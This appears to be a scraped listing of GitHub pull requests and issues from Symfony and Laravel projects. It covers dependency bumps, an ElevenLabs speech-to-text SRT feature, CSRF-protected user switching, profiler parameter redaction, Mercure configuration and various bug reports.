robinvdvleuten

robinvdvleuten

8th Jul 2026 @ 11:33

dependencies

Bumps actions/checkout from 5 to 7.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
dependabot[bot]

dependabot[bot]

1st Jul 2026 @ 06:04

Platform Feature Status: Needs Review
Q A
Bug fix? no
New feature? yes
Docs? yes
Issues Fix #2266
License MIT

[ElevenLabs] Support SRT output for speech-to-text via additional_formats

This exposes ElevenLabs Scribe's speech-to-text options and additional transcript formats (e.g. SRT subtitles) through PlatformInterface::invoke(), so subtitle generation no longer requires bypassing the bridge and calling ElevenLabs directly with the HTTP client.

Motivation

The ElevenLabs /v1/speech-to-text endpoint accepts multipart fields such as language_code, tag_audio_events, num_speakers, diarize, timestamps_granularity and additional_formats, and returns the requested export formats under additional_formats[].content. Until now the bridge sent only file and model_id, and asText() exposed only the plain transcript, so generating SRT required a hand-rolled HttpClient call (see the workaround in the issue).

Changes

1. Forwarding speech-to-text options — ElevenLabsClient

ElevenLabsClient::doSpeechToTextRequest() now receives the merged request + model options (mirroring the text-to-speech branch) and forwards them as multipart fields. Because Symfony HttpClient builds multipart bodies via http_build_query, options are normalized to the wire format ElevenLabs expects:

  • arrays (e.g. additional_formats) are JSON-encoded into a single field;
  • booleans are sent as "true"/"false" (not "1"/"");
  • other scalars are cast to strings.

2. First-class result API — Bridge\ElevenLabs\Result\TranscriptionResult

A new bridge-scoped DTO carrying the transcript text alongside the returned additional_formats. It transparently decodes base64-encoded content and exposes:

  • getText()
  • getAdditionalFormats()
  • getAdditionalFormat(string $format) — resolved by requested_format (e.g. srt, txt, html)
  • asSubRipText() — convenience accessor for SRT

3. Converter — ElevenLabsResultConverter

Speech-to-text responses now return a MultiPartResult containing both a TextResult (so asText() keeps working) and an ObjectResult wrapping the new TranscriptionResult (so asObject() returns the structured result). This mirrors the pattern used by the Mistral OCR bridge and avoids adding bridge-specific methods to the core DeferredResult.

Usage

use Symfony\AI\Platform\Bridge\ElevenLabs\ElevenLabs;
use Symfony\AI\Platform\Bridge\ElevenLabs\Factory;
use Symfony\AI\Platform\Capability;
use Symfony\AI\Platform\Message\Content\Audio;

$platform = Factory::createPlatform(apiKey: $apiKey);

$result = $platform->invoke(
    model: new ElevenLabs('scribe_v2', [
        Capability::SPEECH_TO_TEXT,
        Capability::INPUT_AUDIO,
        Capability::OUTPUT_TEXT,
    ]),
    input: Audio::fromFile('/path/audio.mp3'),
    options: [
        'language_code' => 'en',
        'tag_audio_events' => false,
        'num_speakers' => 1,
        'diarize' => true,
        'timestamps_granularity' => 'word',
        'additional_formats' => [
            ['format' => 'srt', 'include_timestamps' => true],
        ],
    ],
);

$result->asText();                       // plain transcript
$result->asObject()->asSubRipText();     // SRT subtitles
$result->asObject()->getAdditionalFormat('srt');

// The raw payload is still available:
$result->getRawResult()->getData()['additional_formats'][0]['content'];

Backward compatibility

$result->asText() is preserved unchanged for speech-to-text, so existing consumers keep working. The converted result type changes from TextResult to MultiPartResult, but the public entry points (asText(), asObject(), getRawResult()) remain consistent: asText() behaves identically, and asObject() now succeeds (returning a TranscriptionResult) where it previously threw UnexpectedResultTypeException. No UPGRADE.md entry is therefore required.

Tests

  • Updated ElevenLabsConverterTest for the new MultiPartResult shape, with dedicated cases for plain transcripts, additional formats (both raw and base64-encoded content) and the absence of additional formats.
  • Added ElevenLabsClientTest::testClientCanPerformSpeechToTextRequestWithOptions asserting that the multipart body forwards language_code, diarize (true), tag_audio_events (false), num_speakers (1), timestamps_granularity and the JSON-encoded additional_formats.
  • Full platform suite passes (733 tests).

Documentation

  • New "Speech-to-Text" section in docs/components/platform.rst covering the basic transcript and the SRT export flow (validated with doctor-rst).
  • New runnable example examples/elevenlabs/speech-to-text-srt.php.
  • CHANGELOG.md entry under the unreleased 0.11 section.
View more
2 comments
khaperets

khaperets

3rd Jul 2026 @ 12:14

The CI workflows configures the minimum-stability for this job: https://github.com/symfony/panther/blob/bc606efbca9b3189df90e52d10d655e2e52747d7/.github/workflows/ci.yml#L90

However, the committed composer.json already allows this stability while using prefer-stable: true: https://github.com/symfony/panther/blob/bc606efbca9b3189df90e52d10d655e2e52747d7/composer.json#L45-L46

a consequence of that setup is that https://github.com/symfony/panther/pull/682 did not actually ran the CI against Symfony 8.0.x-dev but against 7.3.6 in those jobs (and so missed the fact that the code is not actually compatible with Symfony 8, as reported in https://github.com/symfony/panther/issues/685)

View more
👍 3
stof

stof

2nd Dec 2025 @ 17:40

In order to support doctrine/persistence 4, we need to add some native return types to public non-final methods (#123). While the BC impact is probably minimal, it is a BC break. Besides, it has been 9+ years since 3.0, and 3 years since 3.3. I think it is worth considering a, very minimal, new major version of this package.

This would also allow us to do a small bit of cleanup on the repository. For instance, removing some lower bounds (Symfony 4 and 5, and PHP 7.2 - 8.1), and adding native return types to all methods (in sync with Symfony 7).

Looking at the SymfonyAclBundle, I expect that bundle can support both v3 and v4 at the same time easily. Or we might consider creating a new major release for the bundle as well, allowing us to sync up the repositories.

What do we think?

View more
4 comments 👍 6
wouterj

wouterj

14th Feb 2025 @ 16:40

The newly added section from PR #1526 unfortunately does not meet the Twig coding standards. Twig CS Fixer reports:

 KO .\templates\base.html.twig
 ------- ------------------------------------------------------------------------------------------------
  ERROR   13   |
          14   |         {% set frankenphpHotReload = app.request.server.get('FRANKENPHP_HOT_RELOAD') %}
          >>   | The var name must use snake_case; expected frankenphp_hot_reload.
          15   |         {% if frankenphpHotReload %}
 ------- ------------------------------------------------------------------------------------------------
View more
👍 2
StellarGlitch

StellarGlitch

7th Apr 2026 @ 18:47

The current system of channels is confusing IMO:

  1. There are "secret" channels like e.g. security that exist by default, but you don't see them in your config (config/packages/monolog.php).
  2. Then there's a channel with a predefined name deprecation, but not enabled by default. Could be called "super-secret" cause if you missed the recipe at https://github.com/symfony/recipes/blob/main/symfony/monolog-bundle/3.7/config/packages/monolog.yaml you'll probably never find out that this channel exists (cause it's not shown at php bin/console debug:container monolog)
  3. On top of all that, there are the channels that you define on your own in the config.

So I'm suggesting to enable deprecation by default (just like the built-ins like router etc.).

View more
👍 2
ThomasLandauer

ThomasLandauer

8th Dec 2025 @ 22:21

This is the code that's now generated for an enumType:

#[ORM\Column(enumType: Suit::class)]
private ?Suit $suit = null;

However, setting an explicit enumType on the Column isn't needed anymore, so I'm suggesting to omit it and just generate:

#[ORM\Column]
private ?Suit $suit = null;
View more
ThomasLandauer

ThomasLandauer

26th Sep 2025 @ 16:44

Feature Status: Needs Work
Q A
Bug fix? no
New feature? yes
Deprecations? no
Issues Fix #...
License MIT

I was re-working on the doc pr to expose entrypoint inside a UX bundle.

https://github.com/symfony/symfony-docs/pull/21292

I didn't really like the fact that, to expose an entrypoint in webpack encore, user must add it relative to node_modules folder :

    {
        "name": "@acme/feature",
        "symfony": {
            "entrypoints": {
                "@acme/feature/entrypoint": "../node_modules/@acme/feature/entrypoint.js"
            }
        }
    }

With that change in enableStimulusBridge, we allow to import entrypoint from a bundle like that

// acme-feature-bundle/assets/package.json

    {
        "name": "@acme/feature",
        "symfony": {
            "entrypoints": {
                "@acme/feature/entrypoint": "@acme/feature/entrypoint.js"
            }
        }
    }
View more
Jibbarth

Jibbarth

15th Feb 2026 @ 11:38

This PR adds #701


Replace the manual Unsplash photo ID input in the article form with a Livewire-powered image picker.

The new picker searches Unsplash through a dedicated UnsplashClient, caches search responses, displays results in a scrollable grid with infinite loading, and lets authors preview and remove the selected image before saving. The form continues to submit only the selected Unsplash photo ID, preserving the existing article image synchronization flow.

Unsplash API access is centralized in UnsplashCLient, including photo search, photo lookup, download tracking, retry handling, timeouts, and custom failure exceptions. SyncArticleImage now uses this client to fetch the selected photo metadata an trigger the Unsplash download endpoint.

The implementation also adds Unsplash attribution in the search results and preview, introduces reusable test fixtures for Unsplash responses, and covers the picker and client behaviour with tests.

The README is also modified to explain the current flow. Noticed that the mentioned command no longer exists.

View more
franbarbalopez

franbarbalopez

8th Jul 2026 @ 21:05

dependencies php

Bumps pestphp/pest from 4.7.4 to 4.7.5.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
dependabot[bot]

dependabot[bot]

8th Jul 2026 @ 08:33

dependencies javascript

Bumps laravel-vite-plugin from 1.3.0 to 3.1.0.

import { defineConfig } from 'vite'; import laravel from 'laravel-vite-plugin';

export default defineConfig({ plugins: [ laravel({ input: ['resources/css/app.css', 'resources/js/app.js'], refresh: true,

  •       assets: [
    
  •           '../images/**',
    
  •           '../favicons/**',
    
  •       ],
      }),
    
    ], });

Dependabot compatibility score

You can trigger a rebase of this PR by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)

Note Automatic rebases have been disabled on this pull request as it has been open for over 30 days.

View more
dependabot[bot]

dependabot[bot]

1st May 2026 @ 03:06

Bug Status: Needs Review Mate
Q A
Bug fix? yes
New feature? no
Docs? no
Issues n/a
License MIT

The profiler db collector exposed sample_params — the bound parameter values of each SQL query — to the AI with only a 100-character truncation. For a statement like INSERT INTO users (email, password_hash, reset_token) VALUES (?, ?, ?) that means real user PII and credentials were handed to the model verbatim, against the bridge's "sensitive data stays out" principle.

Bound parameters have no key name to decide which are sensitive, so every leaf value is redacted while the array shape and parameter count are preserved (so the AI can still see the query was parameterized). The SQL text, counts and timings — which carry the diagnostic value — are unchanged.

Note (out of scope): a non-parameterized query that inlines literals into the SQL string itself (WHERE email = '[email protected]') is not scrubbed; Doctrine rarely produces these and it is a separate, harder problem.

View more
wachterjohannes

wachterjohannes

12th Jul 2026 @ 18:28

Q A
License MIT
Doc issue/PR

Add Recipe

View more
1 comment
zairigimad

zairigimad

17th Dec 2025 @ 15:57

If you're a Symfony developer using icons, you should use the ux-icons component. If not, this adds no run-time overhead.

View more
tacman

tacman

26th Apr 2026 @ 14:11

The idea is to allow to use relative path for fonts and/or images.

View more
3 comments 🎉 1
nikrou

nikrou

11th Oct 2017 @ 12:21

Let's improve on this PR to be able to use CopyWebpackPlugin AND add hashes to the destination files when needed: https://github.com/symfony/webpack-encore/pull/409

For reference on how we could accomplish this, the ManifestPlugin can be used to produce hashed files for the CopyWebpackPlugin when needed (code from my personal website):

return new ManifestPlugin({
    filter(fileDescriptor) {
        // Filter out some weirdness coming from source scss files
        return !fileDescriptor.name.match(/.scss$/);
    },
    map(fileDescriptor) {
        // Correct entries regarding the copy-webpack-plugin
        // adding hashes to both handle and file name
        const copyReplacePattern = new RegExp(
            `(${config.serverPath}/images/backgrounds)/(.+)-([0-9a-f]{8}).(jpg)`,
        );

        const copyMatches = fileDescriptor.name.match(copyReplacePattern);
        if (copyMatches && copyMatches.length === 5) {
            fileDescriptor.name = `${config.serverPath}/images/backgrounds/${copyMatches[2]}.${copyMatches[4]}`;
        }

        return fileDescriptor;
    },
    writeToFileEmit: true,
    basePath: `${config.serverPath}/`,
    publicPath: config.isHmr
        ? `//${config.serverHost}:${config.serverPort}/${config.serverPath}/`
        : `/${config.serverPath}/`,
});

This function knows in advance that the only copied files are some images I had in a specific directory, but we can adapt this logic to fix hashes going into the manifest in a more general way.

With this, we could probably stop using the forked WebpackManifestPlugin, as @weaverryan said:

but I think maybe we don’t need that anymore, as the PR I linked to IS merged now
So we could probably require the plugin again at version 3.1.1 or higher

... and work our way from there.

So, to summarize, from @weaverryan :


So, things we could do:

View more
1 comment
shadowc

shadowc

9th Feb 2022 @ 16:57

Hello. I have some error: Your controllers.json file was not found. Be sure to add a Webpack alias from "@symfony/stimulus-bridge/controllers.json" to *your* controllers.json file. I added into webpack.config.js Encore.enableStimulusBridge('./assets/controllers.json') How to fix it?

controllers.json is into assets { "controllers": [], "entrypoints": [] }

View more
3 comments
dokselblackbit

dokselblackbit

13th Dec 2022 @ 10:42

The other day, I ran composer require webapp on a skeleton app during a workshop and this failed like that:

  • Configuring symfony/asset-mapper (>=6.4): From github.com/symfony/recipes:main Executing script importmap:require [KO] [KO] Script importmap:require returned with error code 1 !!
    !! In ErrorChunk.php line 56: !!
    !! Could not resolve host: data.jsdelivr.com for "https://data.jsdelivr.com/v1
    !! /packages/npm/@hotwired/stimulus/resolved?specifier=%5E3.0.0".
    !!
    !!
    !! In CurlResponse.php line 315: !!
    !! Could not resolve host: data.jsdelivr.com for "https://data.jsdelivr.com/v1
    !! /packages/npm/@hotwired/stimulus/resolved?specifier=%5E3.0.0".
    !!
    !!
    !! importmap:require [--entrypoint] [--path PATH] [--] ...

Either we had bad network or jsdelivr was having troubles, but this means installing a webapp pack is not failsafe: if an error occurs in the middle of installing recipes, the app ends up in a f*cked up state. I ran recipes:install and that fixed the last recipes but I don't expect newcomers to know how to overcome this issue.

But I think PackageJsonSynchronizer shouldn't do that in the first place.

Instead, it should delegate doing anything with the network to a later state - e.g. when cache:clear is ran.

That's my current understanding of the issue and at this stage this might be enough for @weaverryan to follow up? :angel: :pray: :muscle:

View more
3 comments
nicolas-grekas

nicolas-grekas

20th Feb 2024 @ 20:46

help wanted findapr

Hi Developer,

I appreciate your work on this project—it's really well-built and helpful for developers like me. I recently implemented it and found it working great.

However, I noticed that the .fl-wrappe class currently has z-index: 10, which causes it to appear under the header when using a fixed or sticky header. I suggest updating it to z-index: 99999 to ensure proper visibility.

Thanks for your efforts and for sharing this project!

Best regards, Md. Jahangir Alam Rohan.

View more
1 comment 🎉 1
rohan9222

rohan9222

18th Feb 2025 @ 04:20

Security Feature Status: Needs Review
Q A
Branch? 8.2
Bug fix? no
New feature? yes
Deprecations? no
Issues #27348
License MIT

Allow scoping user switching to a dedicated route/path and protecting it with a CSRF token, mirroring the logout listener. Pointing the new path option at a POST-only route keeps GET requests from ever changing state.

Usage

Point switch_user at a dedicated, POST-only route and enable CSRF:

# config/packages/security.yaml
security:
    firewalls:
        main:
            # ...
            switch_user:
                path: app_switch_user   # a route name (or path)
                enable_csrf: true       # csrf_token_id defaults to "switch_user"
# config/routes.yaml
app_switch_user:
    path: /switch-user
    methods: [POST]                     # a GET can no longer change state
    # no controller needed: the switch_user listener handles the request

Trigger the switch with a form instead of a GET link:

<form method="post" action="{{ path('app_switch_user') }}">
    <input type="hidden" name="_switch_user" value="{{ user.userIdentifier }}">
    <input type="hidden" name="_csrf_token" value="{{ csrf_token('switch_user') }}">
    {# optional: return to the current page afterwards #}
    <input type="hidden" name="_target_path" value="{{ app.request.pathInfo }}">

    <button>Impersonate {{ user.userIdentifier }}</button>
</form>

Exiting works the same way, with the _exit value:

<form method="post" action="{{ path('app_switch_user') }}">
    <input type="hidden" name="_switch_user" value="_exit">
    <input type="hidden" name="_csrf_token" value="{{ csrf_token('switch_user') }}">

    <button>Exit impersonation</button>
</form>

path can alternatively be set to just a path (/switch-user) instead of a route.

Leaving path unset keeps the existing query-parameter behavior unchanged.

Possible Future Scope

  • use_referer option — opt-in Referer fallback in the redirect chain, mirroring form_login's use_referer.
  • Twig helper for path mode - impersonation_path() to emit the configured path as the form's action URL.
  • RESTful URLs — model impersonation as a resource:
    • POST /switch-user/{username} — target user via route param instead of _switch_user (mostly works today via the attributes fallback).
    • DELETE /switch-user — un-impersonate with no target param (clean exit semantics; client needs real DELETE via JS/_method).
View more
3 comments 👍 1
kbond

kbond

11th Jul 2026 @ 18:26

Bumps actions/checkout from 6 to 7.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
1 comment
dependabot[bot]

dependabot[bot]

22nd Jun 2026 @ 11:32

Hello,

Here is our scenario that break our acl workflow when we want to add another mask entry for an user. We have a flow that let our admin user to switch from their admin account to another access level temporarily. Then by action we want to add the temporary access level on the acl entries through insertObjectAce and then save the action updateAcl, we got on some case an undefined index 0 or any index when it does not exists on the old value of the objectAce.

here is the part of the code

$objectsAce = $acl->getObjectAces(); $isUpdated = false;

        foreach ($objectsAce as $index => $objectAce) {

            /** @var Entry $objectAce */
            if ($securityIdentity->getUsername() !== $objectAce->getSecurityIdentity()->getUsername()) {
                continue;
            }

            $acl->updateObjectAce($index, $maskAccess);
            $isUpdated = true;
            break;
        }

        if (!$isUpdated) {
             $acl->insertObjectAce($securityIdentity, $maskAccess);
        }
View more
1 comment
nisiah78

nisiah78

24th Jun 2024 @ 08:47

Q A
License MIT
Doc issue/PR none

Just an idea: Wouldn't a deduplication handler make sense here? I mean, who needs the same deprecation message 10.000 times?

View more
1 comment
ThomasLandauer

ThomasLandauer

7th Dec 2025 @ 22:54

Hello :), On my local environment, I'm using an HTTPS connection and the Mercure recipe files. However, MERCURE_PUBLIC_URL and MERCURE_URL are in HTTP.

When I run symfony var:export --multiline | grep MERCURE, I get the following lines:

export MERCURE_PUBLIC_URL=http://127.0.0.1:32928/.well-known/mercure
export MERCURE_URL=http://127.0.0.1:32928/.well-known/mercure

I would rather have the URLs in HTTPS.

Is there any additional configuration missing from the recipe?

# compose.yaml

[...]

###> symfony/mercure-bundle ###
  mercure:
    image: dunglas/mercure
    restart: unless-stopped
    environment:
      # Uncomment the following line to disable HTTPS,
      SERVER_NAME: ':80'
      MERCURE_PUBLISHER_JWT_KEY: '!ChangeThisMercureHubJWTSecretKey!'
      MERCURE_SUBSCRIBER_JWT_KEY: '!ChangeThisMercureHubJWTSecretKey!'
      # Set the URL of your Symfony project (without trailing slash!) as value of the cors_origins directive
      MERCURE_EXTRA_DIRECTIVES: |
        cors_origins https://127.0.0.1:8000
    # Comment the following line to disable the development mode
    command: /usr/bin/caddy run --config /etc/caddy/dev.Caddyfile
    healthcheck:
      test: ["CMD", "curl", "-f", "https://localhost/healthz"]
      timeout: 5s
      retries: 5
      start_period: 60s
    volumes:
      - mercure_data:/data
      - mercure_config:/config
###< symfony/mercure-bundle ###
# compose.override.yaml

[...]

###> symfony/mercure-bundle ###
  mercure:
    ports:
      - "80"
###< symfony/mercure-bundle ###

Thanks!

View more
6 comments
seb-jean

seb-jean

12th Apr 2025 @ 05:07

Currently, PR #550 is only available in the 1.x branch.

@dunglas Would it be possible to merge it into main and create a new release for version 2? Or do you need a new PR for this?

I need this change to get the tests of minkphp/driver-testsuite running in robertfausk/mink-panther-driver.

View more
1 comment
robertfausk

robertfausk

3rd Apr 2025 @ 08:29

more information needed

The notification settings form suggests that it is possible to change the address used for notifications, whereas it is impossible to save modifications made manually.

The original setting is restored after each page reload :-(

what to do when you have to use a particular address ?

View more
1 comment
Pingoo31

Pingoo31

6th Apr 2024 @ 10:57

View more
makraz

makraz

28th Jun 2026 @ 17:13

The proposed PHP 8.6 "Serializable closures" engine support (implementation at nicolas-grekas/php-src#4) gives every closure declared in an attribute argument or in a parameter default value a canonical per-class id, derived from a deterministic, non-evaluating walk over the class's constant expressions, exposed as ReflectionFunction::getConstExprId() and resolved by Closure::fromConstExpr(). This PR makes deepclone use those ids, gated on PHP_VERSION_ID >= 80600, assuming the RFC lands.

  • Encoding. On PHP 8.6, deepclone_to_array() calls the exported zend_constexpr_closure_ref() and emits [class, id, line] under the existing mask marker. This replaces the per-call declaration-site scan, which had to evaluate every preceding site to count closures: on a 60-site class, encoding the last closure drops from 8.3 us to 1.2 us, and resolving it from 0.3 us scan-equivalents to a 17 ns/site pointer walk. Closures declared in class constant values and in property default values are evaluated in place by the engine and have no id; they keep the site-based 5-element form.
  • Decoding. deepclone_from_array() accepts both forms on every PHP version, discriminated by the type of element 1 (int id vs string site). Site-based payloads written on PHP 8.5 keep resolving on PHP 8.6, so caches survive the upgrade; engine-id payloads on older PHP fail with a message saying they need PHP 8.6. Resolution goes through zend_constexpr_closure_site_by_id() plus the same staleness check as before (stale payload when the declaration line moved). Crafted payloads addressing a first-class-callable site are rejected; FCCs keep the named-closure form.
  • Gating is unchanged. Closure must be allowed before anything is evaluated on the to_array side, and the payload-named class is allow-list-checked before zend_lookup_class() on the from_array side.
  • Runtime closures now surface the engine's own Closure::__serialize() refusal (Serialization of 'Closure' is not allowed) instead of NotInstantiableException, since Closure gains that method on 8.6.

The new code only compiles on PHP >= 8.6, so the current CI matrix is unaffected; the 8.6 paths were validated locally against the patched engine (all phpts pass, and the polyfill suite passes against this build with byte-identical, cross-resolvable payloads). deepclone_constexpr_closures_native.phpt covers the 8.6 behavior, deepclone_constexpr_closures_id_pre86.phpt the refusal on older PHP.

Companion polyfill implementation: symfony/polyfill#633

View more
nicolas-grekas

nicolas-grekas

10th Jun 2026 @ 21:38

Feature Status: Needs Review Messenger
Q A
Branch? 8.2
Bug fix? no
New feature? yes
Deprecations? no
Issues n/a
License MIT

Docs: https://github.com/symfony/symfony-docs/pull/22457

Adds a Symfony Messenger transport backed by asynchronous SQLite I/O that supports durable, delayed, at-least-once delivery without blocking an Amp event loop.

View more
fabpot

fabpot

14th Jul 2026 @ 16:24

DependencyInjection Status: Needs Review

Documents the feature added in symfony/symfony#64652 (merged in 8.2): tag attributes can now be computed for each tagged service, instead of a single static array shared by all of them.

Fix #22441

Added as a "Computing Tag Attributes per Tagged Service" subsection at the end of "Autoconfiguring Tags" in service_container/tags.rst. It covers the [class-string, method] callable form first, since it works on PHP 8.4 and is the only one expressible in YAML _instanceof, then the closure form (PHP 8.5+).

I leaned on the feature PR for the motivation — the static method is declared by the interface, so static analysis catches a typo in an implementation, which is what the deprecation of default_index_method/default_priority_method had taken away.

A few details I checked in the code rather than assumed:

  • attributes are resolved in ResolveInstanceofConditionalsPass, per concrete and instantiable class; non-instantiable ones are skipped.
  • the callable must return an array, otherwise an InvalidArgumentException is thrown.
  • I did not mention XML: XmlFileLoader no longer exists on 8.2.
View more
Amoifr

Amoifr

10th Jul 2026 @ 06:27

In app/Livewire/ListIssues.php around line 98 where we are catching GitHubRateLimitException, we are returning a 503 status code.

503 indicates the server is temporarily unable to handle the request. I do not think that is precise enough for what is happening and status 429 would be more appropriate.

HTTP status code 429 is specifically designed for rate limiting scenarios. It indicates the user has sent too many requests in a given amount of time ("rate limiting"), which is what the GitHubRateLimitException is meant to catch.

View more
1 comment
kengitahi

kengitahi

4th Mar 2025 @ 18:04

bug

What happened?

We have a Laravel project that has the following migration steps:

  • Create column Y_temp
  • Migrate data from column X to Y_temp
  • Drop column X
  • Rename column Y_temp to X

These migrations worked without any problem on CockroachDB version 22.2.8. After updating to version 23.1.16 the renaming step from a new column to one that has been deleted previously throws the following exception:

In AbstractPlatform.php line 452:
                                                                                                                 
  Unknown database type anyelement requested, Doctrine\DBAL\Platforms\PostgreSQL100Platform may not support it.  
                                                                                                              

How to reproduce the bug

Set up a new Laravel project with CockroachDB version 23.X.X. Create migrations with the following steps:

  • Create a new table
  • Create column X
  • Create column Y
  • Drop column X
  • Rename column Y to column X

The last step should fail with the exception from above.

Package Version

1.3.0

PHP Version

8.2.0

Laravel Version

10.47.0

CockroachDB Version

23.1.6

Which operating systems does with happen with?

No response

Notes

I have already done some digging around. At first, I stumbled across this issue: https://github.com/doctrine/dbal/issues/6248 with an associated PR that never got merged. The changes in the PR worked on my machine, so it seemed to be a general bug in the Postgres implementation of doctrine. But after it tried to run the tests in the PR / write my own tests for it, I found out that it is actually not a problem with a plain PostgreSQL Database. It throws this exception only on a CRDB version above 23 and not on a plain PostgreSQL.

The SQL-Statement in the PostgreSQLSchemaManager from the selecteTableColumns-Function actually returns a different Result between CRDB Version 22, 23 and PostgreSQL 16. In CRDB v23, it also returns the dropped fields named like this: ........pg.dropped.15...... with the type anyelement. Doctrine now tries to cast the type anyelement which does not exist in the PostgreSQL implementation, causing the exception.

The changes in the PostgreSQLSchemaManager from the PR above does fix this issue. But i think it should not be implemented in the Doctrine DBAL 'cause it is not a PostgreSQL bug. I think we should find a way to somehow implement the fix in this package.

View more
7 comments 👍 1
Vision42

Vision42

8th Mar 2024 @ 08:59

Q A
Bug fix? yes
New feature? no
Deprecations? no
Issues Fix #3514
License MIT

The TwigPreLexer was treating any {# it encountered as the opening of a Twig comment, even when that {# actually lived inside a Twig output expression (e.g. inside a string literal passed to |trans). When the matching #} was missing — typically the case for ICU MessageFormat plural strings like {count, plural, one {# item} other {# items}} — the lexer consumed the rest of the template as a fake comment, swallowing any <twig:…> tags after it.

This PR adds a top-level handler for {{ … }} in the PreLexer's main loop. The new helper consumeTwigExpressionContent() walks the expression body with string-literal awareness (single quotes, double quotes, \\-escapes), so that }} or {# appearing inside a string don't end the expression early or trigger comment mode. The implicit {% block content %} injection still kicks in when the expression appears as content inside a component.

5 regression tests added covering:

  • the original ICU plural example from the issue
  • }} inside a string literal in {{ … }}
  • {#…#} inside a double-quoted string
  • escaped quotes inside the expression
  • {{ … }} inside a component (default-block injection)

Marking as draft pending @Kocal's input on the scope question raised in #3514: should this same protection be extended to {% … %} (where {% set foo = '{# bar #}' %} has the same latent issue), or kept focused on {{ … }} ?

View more
Amoifr

Amoifr

4th May 2026 @ 14:10

View more
3 comments
HarasimowiczKamil

HarasimowiczKamil

20th Mar 2024 @ 14:05

Q A
Issues Companion to symfony/ux#3484
License MIT

Companion PR to symfony/ux#3467. Adds the Toolkit/Shadcn docs page for the navigation-menu recipe.

Kept as draft until symfony/ux#3467 (which introduces the upstream recipe) is merged.

Split out from the original #54 so each component can be reviewed/merged independently alongside its upstream recipe.

View more
3 comments
Amoifr

Amoifr

18th Apr 2026 @ 14:20

Doctrine Status: Needs Review

Problem

The current keep_replica tip in doctrine/dbal.rst reads as if keep_replica: true makes read queries continue going to the replica after a write operation (eventual consistency). That contradicts the bullet point right above it on the same page:

Once the primary has been used, all subsequent operations on that connection use the primary too, ensuring read-your-writes consistency.

and the documented behavior of PrimaryReadReplicaConnection itself. In practice, keep_replica: true does not change the automatic routing — once the primary has been picked, reads keep going to the primary for the rest of the connection's lifetime, regardless of keep_replica.

What keep_replica: true actually enables is an explicit switch back to the replica via $connection->ensureConnectedToReplica() (without keep_replica: true that call becomes a no-op, because after a write the replica slot is overwritten to point at the primary).

This becomes practically relevant in long-running processes (Symfony Messenger workers, FrankenPHP worker mode), where the connection instance persists across requests/messages and there is no built-in mechanism that resets DBAL connection state between them. Users running read replicas under workers usually want a way to switch back to the replica between requests; the natural fit is keep_replica: true + explicit ensureConnectedToReplica() wired through a ResetInterface service (Messenger) or a kernel.terminate listener (FrankenPHP).

Changes

  • Rewrite the keep_replica tip to describe its actual effect: it preserves the replica connection slot, enabling an explicit ensureConnectedToReplica() switch later.
  • Add a short paragraph inside that tip pointing out that, in Messenger workers and FrankenPHP worker mode, the switch back to the replica between requests/messages must be wired manually.
  • Extend the existing note about long-running processes to mention FrankenPHP server worker mode alongside Messenger workers.

Happy to adjust the wording — let me know.

View more
kamil-jakubowski

kamil-jakubowski

25th May 2026 @ 13:43

Hello,

I am getting the exact same problem as the one described here:

https://github.com/symfony/symfony/issues/5108

It has been working fine until I ran composer update today. But now:

$ bin/console doctrine:schema:validate

Mapping
-------


 [OK] The mapping files are correct.


Database
--------


 [ERROR] The database schema is not in sync with the current mapping file.



$ bin/console doctrine:schema:update --force --dump-sql

 The following SQL statements will be executed:

     ALTER TABLE acl_classes CHANGE id id INT UNSIGNED AUTO_INCREMENT NOT NULL;
     ALTER TABLE acl_security_identities CHANGE id id INT UNSIGNED AUTO_INCREMENT NOT NULL;
     ALTER TABLE acl_object_identities CHANGE id id INT UNSIGNED AUTO_INCREMENT NOT NULL;
     ALTER TABLE acl_entries CHANGE id id INT UNSIGNED AUTO_INCREMENT NOT NULL;

 Updating database schema...

     4 queries were executed


 [OK] Database schema updated successfully!

Playing those two command another time each will result in the same output.

